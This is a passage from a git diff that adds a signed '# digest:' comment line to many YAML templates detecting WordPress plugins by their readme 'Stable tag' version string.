4a0a00473045022069f0a2243f15a2114c5ae665bbb06075bd4716de14464ba19a9d198919646d50022100d8388f56c68a9fe1ccae13bf0a550805aa3042689b523e1a7536d8e1892d2907:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..cc115755c6 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402204365bd0a6efd5475169892d74fedc51fab280bfc801c1fbe25ceae7f4232e2c20220337f833fbf9992da1172213ba8882b372132661e8c7b9738e2d6e8fb392d54fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..06e6f84bed 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204384be4669db081e4c4bd00c2af96bf86aad969baff5ac75d9a1e13c729c55f4022100b6f7db7b1f5a8ac4eb0310404398b9477a366276dc435c5f05c6cd9b6f7d8441:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..f2e67c3bd6 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022037da9a7ce74415bce1bb4a00825b6dbeaf9d81bcf240b54274fde0094b7d14ad02207b3dc0678876b51af6d61f4bfa6eaeb15ea040852a073b9f6a32b72176112787:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 59a655c424..c18c56dd4b 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220238a4f1d604ff2b65365577e0760b78d581ab34232b455bc3df924453516eca20220646eb7aba511d3bbae86d498ca741b78be431c7a13f33251a6985be0b84859c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..06c9502558 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022043f73bd029228f8d054364f05fd02d44aa9f91039a90f0c0ca68e96ebf2f4764022100c2ed156db8aaabcf48d397c0ffb312f46725dc7b31d2bcb0228dcc8318ca0558:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..de276e9836 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502201c9cb7cac9cc38dd1f5807e2c126137898369d9c67732d3b840c6bcd1767c5c0022100cc14dd58e4966ecf29c30706b9621e33895ccc80b60839677315d7009f922e74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..f167055cc3 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100810c80b4efe5f975eca01c85e6b0f45919382ec662f1530dfcae188067dc0098022100d16094faa231021ca376338e6352edd4eae7c86fcb6992ccdd023e62ae18b117:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..c12803ee1e 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100beaabd94d8d204958dde3d622834f64e885cf57ba0bd7a2a98d89f24bc9acaf702200a400b40ef64a5acc465e2a38efebc1f0f56acff3ee89b3b4159d6716ee8936d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..34ab72acdc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204b731e068cba628a84c61b9aeb8a9e4453fb7d7945f183245d9381863019a2a6022100a69e302bd704a1ebd6cd1fa02f0f86d3c5318441fc8f08a21431048b3df8bcb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..5333fc90fb 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402204b0938edf001e8b14e3d825873b7e77c88bd83cbb4fa1ce95181094eca89e779022053bd6397cadb3cf8f7aefd3af591ac28d2dfc29debe325aff14c54380868714a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..8a0f93d1e2 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502207e857a1993a9749cdc78c6be352f6bee58973f5a514e8c26a887c8c06ecd203a022100c8c5a74d8d904d823811570c1c80c917277f8d8b53384b55344ab67fe7b3ec0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..bc90527bf3 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100ad47d6209595c2a303f3061510e5479eb8022fc0c96bec414782d15cf35ea29b022073864221a052dfc21f10996c11cb40cf2ff81a1b5d771991dab1b8b01d90b598:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..bd130a018a 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100d4d4018ad5564addfcfca45561566a7bee0c14025d5026b7b8ebed97bd5a5c71022100f0dbe2c54f04151aa2a54a79490780689ef04b0e81b2a721952f72d8d530378c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..ac9cfd847a 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100d79449d9a9fbba871fdfb83b521dab84b18b0dd67b7deaf021fe2a428e78858202206972f9672d360b141c3a9149c5f2a572d231e2e9d2e1abbcfe7f51aa490d7b9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..b9281cb733 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402205c589b873c16ad2efd251048bb3affd227597a40208b0bc5cad8cba4ef9527800220253b5106f0292ac467ca6a51750a5cbdd7a39cb866ddb59705010910f9a533a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..7b28a37c41 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402200e676fe42f10f334fa8091814aca9979ea989adedfbc405d32d5f93daec685ac0220071a53c05bab04973a9562acf8d26ded3084b86b22420fa6b7158d5f34085c69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..cb19c63cfc 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100da36c54c3dfc7e7d972d69797e432e6a50d4b2c231dbc7a07705f61d303c67700220695efab47859d45ded049233506799de1004a9aac6c3b5a624448f3a74209f22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 4f99876557..0af9a589b8 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022061df32a09236bcd967ba8790edf8a898b45af4d0569e3efb641d1175a44aeef8022079cf5a709f39f74ea8fed43ea2f2fcef60797ae788525958a700dd36cea2e5ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..bcfe87199d 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221009ffc56729967fd7997499a213823bc78f314fae5d683292faeb0f411ac76e55c02202e496366852bbf1f48912ec5424ed9c0318c310a9cefdc6a6dfc91b8382c6db4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 97b7306b75..dc5113e30f 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022075f15f45be40dbf8b859edd87eaa1e146ecdf1084fb52c4cd1adf415befefb7c0220529354a50e9c5307fae0f6fe85b3f84dde2ce451fcf65c5bb700537355d9f295:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..a6bdc7b655 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502202ae7f76afb85b853bd093e395e04877a278bff654bb1c944e3816a7949bc0d80022100a39a34faeee160de233df6f887a33e4deee36b1fceeff77e820cd20c6114774c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..4c59c55335 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220734827528ae6c4d67ca685aa71fda0f74b4e4c73f3f5068423f455ce98ddfd09022100a88928df333024d7cc88c7ab7d9aac157fde1fad140e0f5ead119880b892248d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..6600e6760a 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100f88cdda2a8d913e1dab45a29fcf7a5c6066ae746644e98f8f403dc109c75807f0220561749ab21d93c4bed240670c61f0596cc791e31d64d278fb63fb70a7a52ef1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..152061cb43 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402201fd11d56b4431af4fd008601144814a6af153134c839e87dd8b98101e0fb62740220398be4bbe862fead249542f23bec1f7e4d6c35db068c391272ef2628db23139e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..55d646292c 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100810713b4c92c998af2b1b1a02ae662466f621beea2a5b3e1683459137a061bd5022020fec7c015053388955a68e76da82e20304409bfb6dc3420c74f9c5a5829aecc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..82169c615e 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100e9cb6ec3ddd009e408e8c76356f3fec83bbc5d68ab8fde94383f8e5a713071a202201f9d9a97a3b5e3818000a483f1cae85cb3d5acbf82009437217c1dce7b1f5611:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..2ea0922556 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022058d8dd5f808bb713331b46c75f12d62db902db5805d7508fbf214a49843642c602205a16bef13ac6d91d5c129faaa50d84ba2f5314b7b4ac1047e07c83aa11ac6658:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..5e0ff38672 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100ec8b7c696ea5918fe3521da292e32e501bd3680fb7cfbed484fc2a1ffe095268022100adc9e2583973e9cf4639dccd7bac69276dcd2a5beba9a38f25c419b156b07d54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..da28b778ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221008e43bee7bc63ce27c193b98489d5cffe88fe0878ed10d6608f6344df125609b4022100dcdf48a9b5d0b496a727ce4bf32d2a4f2f16ff4344fadd723d5e9ae51fb4d1c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..32b67f40e2 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100ec3769b0f2fd07f7cca6d5b31fccbf0cbda2fa6ba0f475d021d76b99ab745c64022100c6caeb990188e76ef745638a141007ba92e66c4bb6ebd6b1635eb05a7f72305b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..2b8fe3c56a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221009c96dd20974e1a1e48e508554c71402ddc3fb7cade3c984d2708f4c741fa72a1022100a99478d27eeb4e2a948a92c4e2ec83950e4772ec3c1addef9f63e4d750faa822:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..400546d892 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220273aeb0ddd6b3606d7184a881c57cf556c6a70bbd3e89ea63a9704cc97947866022100c5ab3bdc0185932ce94c1d780365f9536e87698e138a4d634038b3c26699d398:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..b7ef031b8e 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100a6c59486743f47d2ee57a907578214b9c2e893985e41cd680099b32807231060022048065713322d1c5a68a6dc3596dc6667862ed06e8193d64d05d0c7269f0dccd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index b6f392efba..14d1952dfa 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100977fd24c23b72e7677b3ce746522e61c46d6ea2ec08eab413117d4fc12ec55eb0221008d1a196a5433b10f4efb75ef49baf614054d70298a9fbe2eeacfd52c9e02bab0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..6ae55601de 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402206def5f29023d1625868640149bd1d7cf8434cd58f68cba29dc8991a4694062af02200ca60a39714ee41023e7ccf25a031d57422e218557caaddf925bf39b640a7055:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..58e229ee39 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100fc3de599e94e620ffe92a94db207b9c437bc9e629e010b60eccb8ed60aa1b413022021842bf764a86da2105c16f5137069257a7d73f6ef62dd004aab8ac0671e0566:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..d2e7f45388 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100883e97efe3ba0870a476cae1c256a89784a94c5759dad44d4c34a560d8ca953302206c8e040b77118829f54e32faa2eab239a9af49805cda0da906b3ced91e9cc830:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..15a1e5793c 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100ddab1f6148ffca24888d5a613631f39563ac19694f3a4a0477e31bffd342a9bf0221009e359411d63e36444343c5d877b20b8355b55acb93b8cfa5f5ea5934c6e74b9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..ccc20a61aa 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022027546a685010f2eb5ce960f4d9a47f385ca3e9b8fd77ad2e988a9ae2448dbd8f022026a483695a095cf5322a09a009113ecfab90ec068928249eea1b9ed1e9611cbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c20ed6552a..c69bd1d1ed 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022043ee412afd95fdf1a6793f8e78fbf3e32063ea56d320910f680ec69e26dd40590221009ad86e2d2c235d33cbbb9481daf55d73439ca0b6a5dd3d34fec31d92948b86dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..687dc0f7d8 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100e29cdb1b2b3952ee6c6a18ed32f9b0feb08b419c25a6143fd255ee1333d7df87022100b5432fd377f1a722e2cf3cacd4b789d0de862aec68533e20aaeb570da5cba4c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..963e220f37 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100fe6f4de12dc15815eec580d7a65cd87b7990095fb4fbd8818132cb87143f1806022100a6ad78ad0ad49c70b99474ef8d3d1d48be6f5221551ea323c9f1fdbdd24766b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..c530dddcf0 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100b684f113fadea32a543adb90580fe22004bfdc10e6352ddb4a7468d979f66a6b0221008da53546a35d3e4c89794c3425a96e31445ce0276da425c3c49b069f4b0039a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..fbfb9496eb 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100975fa8a649ab51c444f80d4e784dfedb7dc51dcf37363800f66524ce1160136f022100dbafc0b55f9188ffe6e23c0f6c903949d96b0979fa7024d4a160de0887d8eee6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..02543398be 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100c2acac215029c1b7a729981eedef7d1ab69030b3b6d277372de6a416f97feb1f02206297711bbc1e8e3e94e81d74bd014beda8f50371dae497e28b4014ac90ed6072:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..db4ecf9b15 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100ebbb7a02cd902a9d2c4907e59e53dd90a102c2f27f07d2e00578e7401ea7305302202df40ffdc61418da631a530352fe068d1c878871e38c965b87820f584727f8f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..1e4f375bc9 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,5 @@ http: part: body regex: - 